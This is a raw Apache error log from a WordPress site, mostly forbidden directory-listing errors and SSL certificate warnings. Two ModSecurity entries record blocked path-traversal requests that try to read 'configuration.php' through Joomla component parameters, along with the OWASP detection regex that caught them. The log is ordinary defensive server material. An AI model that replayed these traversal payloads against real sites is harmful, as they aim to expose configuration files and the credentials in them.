AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/site-tagline/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:06:22.348266 2023] [autoindex:error] [pid 2572:tid 140480612308736] [client 91.92.242.136:48582] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/site-title/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:06:36.028011 2023] [autoindex:error] [pid 2442:tid 140480629094144] [client 91.92.242.136:48586] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/social-link/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:06:39.912688 2023] [autoindex:error] [pid 2442:tid 140480662664960] [client 91.92.242.136:48590] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/social-links/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:06:55.952298 2023] [autoindex:error] [pid 2572:tid 140480713021184] [client 91.92.242.136:48626] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/spacer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:07:01.491904 2023] [autoindex:error] [pid 2443:tid 140480879892224] [client 91.92.242.136:48634] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/table/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:07:08.035129 2023] [autoindex:error] [pid 2572:tid 140480671057664] [client 91.92.242.136:48648] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/tag-cloud/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:07:10.236938 2023] [autoindex:error] [pid 2572:tid 140480679450368] [client 91.92.242.136:48656] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/text-columns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:07:16.209655 2023] [autoindex:error] [pid 2572:tid 140480704628480] [client 91.92.242.136:48660] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/verse/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:07:19.821588 2023] [autoindex:error] [pid 2441:tid 140480721413888] [client 91.92.242.136:48678] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/video/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:07:23.202569 2023] [autoindex:error] [pid 2441:tid 140480713021184] [client 91.92.242.136:48682] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:07:30.315512 2023] [autoindex:error] [pid 2443:tid 140480780162816] [client 91.92.242.136:48688] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:07:51.224313 2023] [autoindex:error] [pid 2441:tid 140480662664960] [client 91.92.242.136:48696] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/block-directory/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:08:01.324655 2023] [autoindex:error] [pid 2442:tid 140480696235776] [client 91.92.242.136:48708] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/components/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:08:02.756869 2023] [autoindex:error] [pid 2572:tid 140480637486848] [client 91.92.242.136:48712] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/customize-widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:08:10.557437 2023] [autoindex:error] [pid 2442:tid 140480645879552] [client 91.92.242.136:48718] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/list-reusable-blocks/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:08:15.420111 2023] [autoindex:error] [pid 2572:tid 140480612308736] [client 91.92.242.136:48724] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/nux/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:08:21.501641 2023] [autoindex:error] [pid 2572:tid 140480754984704] [client 91.92.242.136:48728] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/edit-post/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:08:30.828141 2023] [autoindex:error] [pid 2442:tid 140480662664960] [client 91.92.242.136:48732] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/edit-widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:08:43.402528 2023] [autoindex:error] [pid 2572:tid 140480746592000] [client 91.92.242.136:48738] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/editor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:08:51.273989 2023] [autoindex:error] [pid 2572:tid 140480888284928] [client 91.92.242.136:48742] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/format-library/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:08:58.046348 2023] [autoindex:error] [pid 2442:tid 140480612308736] [client 91.92.242.136:48752] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/reusable-blocks/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:09:04.257609 2023] [autoindex:error] [pid 2443:tid 140480746592000] [client 91.92.242.136:48756] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:09:08.965475 2023] [autoindex:error] [pid 2572:tid 140480713021184] [client 91.92.242.136:48764] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:09:14.777630 2023] [autoindex:error] [pid 2441:tid 140480888284928] [client 91.92.242.136:48772] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:09:22.680358 2023] [autoindex:error] [pid 2572:tid 140480637486848] [client 91.92.242.136:48780] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:09:44.461072 2023] [autoindex:error] [pid 2572:tid 140480629094144] [client 91.92.242.136:48786] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:09:48.392719 2023] [autoindex:error] [pid 2572:tid 140480729806592] [client 91.92.242.136:48790] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:09:56.072247 2023] [autoindex:error] [pid 2442:tid 140480754984704] [client 91.92.242.136:48798] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:09:57.874744 2023] [autoindex:error] [pid 2572:tid 140480763377408] [client 91.92.242.136:48802] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/wlw/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:10:01.025669 2023] [autoindex:error] [pid 2572:tid 140480645879552] [client 91.92.242.136:48806] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:10:03.268671 2023] [autoindex:error] [pid 2442:tid 140480763377408] [client 91.92.242.136:48810] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:10:08.015169 2023] [autoindex:error] [pid 2442:tid 140480704628480] [client 91.92.242.136:48816] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/crop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:10:14.519059 2023] [autoindex:error] [pid 2443:tid 140480662664960] [client 91.92.242.136:48820] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/dist/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:10:28.069226 2023] [autoindex:error] [pid 2572:tid 140480679450368] [client 91.92.242.136:48826] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/dist/vendor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:10:39.296282 2023] [autoindex:error] [pid 2441:tid 140480754984704] [client 91.92.242.136:48830] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/imgareaselect/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:10:48.319430 2023] [autoindex:error] [pid 2441:tid 140480721413888] [client 91.92.242.136:48834] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/jcrop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:10:57.114017 2023] [autoindex:error] [pid 2443:tid 140480637486848] [client 91.92.242.136:48844] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:10:58.529805 2023] [autoindex:error] [pid 2442:tid 140480713021184] [client 91.92.242.136:48850] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/jquery/ui/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:11:05.731622 2023] [autoindex:error] [pid 2443:tid 140480888284928] [client 91.92.242.136:48858] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/mediaelement/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:11:11.774128 2023] [autoindex:error] [pid 2572:tid 140480704628480] [client 91.92.242.136:48862] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/mediaelement/renderers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:11:17.478650 2023] [autoindex:error] [pid 2572:tid 140480771770112] [client 91.92.242.136:48868] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/plupload/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:11:25.853793 2023] [autoindex:error] [pid 2572:tid 140480888284928] [client 91.92.242.136:48876] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/swfupload/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:11:32.208834 2023] [autoindex:error] [pid 2572:tid 140480796948224] [client 91.92.242.136:48880] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/thickbox/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:11:56.001200 2023] [autoindex:error] [pid 2443:tid 140480721413888] [client 91.92.242.136:48906] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:12:00.856489 2023] [autoindex:error] [pid 2442:tid 140480888284928] [client 91.92.242.136:48910] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/langs/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 16:12:03.076247 2023] [autoindex:error] [pid 2443:tid 140480738199296] [client 91.92.242.136:48914] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/charmap/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Nov 06 00:42:15.240849 2023] [ssl:warn] [pid 15258:tid 140481071028096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 06 02:52:10.889717 2023] [:error] [pid 8342:tid 140480637486848] [client 13.95.233.74:59682] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Nov 06 02:52:13.571538 2023] [:error] [pid 8340:tid 140480729806592] [client 13.95.233.74:59684] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Nov 06 03:12:20.248202 2023] [ssl:warn] [pid 12123:tid 140020427884416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 06 03:12:28.433040 2023] [ssl:warn] [pid 12126:tid 140020427884416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 06 03:12:28.783775 2023] [ssl:warn] [pid 12126:tid 140020427884416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 06 03:12:30.292480 2023] [ssl:warn] [pid 12126:tid 140020427884416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 06 03:12:32.552905 2023] [ssl:warn] [pid 12541:tid 140650606692224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 06 03:12:44.738170 2023] [ssl:warn] [pid 12546:tid 140650606692224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 06 06:32:15.803293 2023] [autoindex:error] [pid 12568:tid 140650213226240] [client 46.30.40.98:36400] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/post-navigation-link/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/post-navigation-link/index.php [Mon Nov 06 11:55:30.460640 2023] [:error] [pid 12570:tid 140650246797056] [client 91.134.248.211:42604] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php, referer: http://simplesite.com [Mon Nov 06 14:05:35.321684 2023] [:error] [pid 12570:tid 140650423949056] [client 91.92.245.130:46004] [client 91.92.245.130] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/components/com_hdflvplayer/hdflvplayer/download.php"] [unique_id "ZUk4_5DOyoRChfQi57WcfAAAAIA"] [Mon Nov 06 14:05:36.600141 2023] [:error] [pid 13110:tid 140650238404352] [client 91.92.245.130:46008] [client 91.92.245.130] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?option=com_macgallery&view=download&albumid=../../configuration.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "ZUk5ABHGyj5IbFDXUtsekgAAAM4"] [Mon Nov 06 15:21:57.728764 2023] [autoindex:error] [pid 13110:tid 140650162870016] [client 103.180.163.207:47782] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 07 03:10:50.925716 2023] [ssl:warn] [pid 28161:tid 140545455499136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 07 03:10:55.114649 2023] [ssl:warn] [pid 28176:tid 140545455499136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 07 03:10:55.687826 2023] [ssl:warn] [pid 28176:tid 140545455499136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the 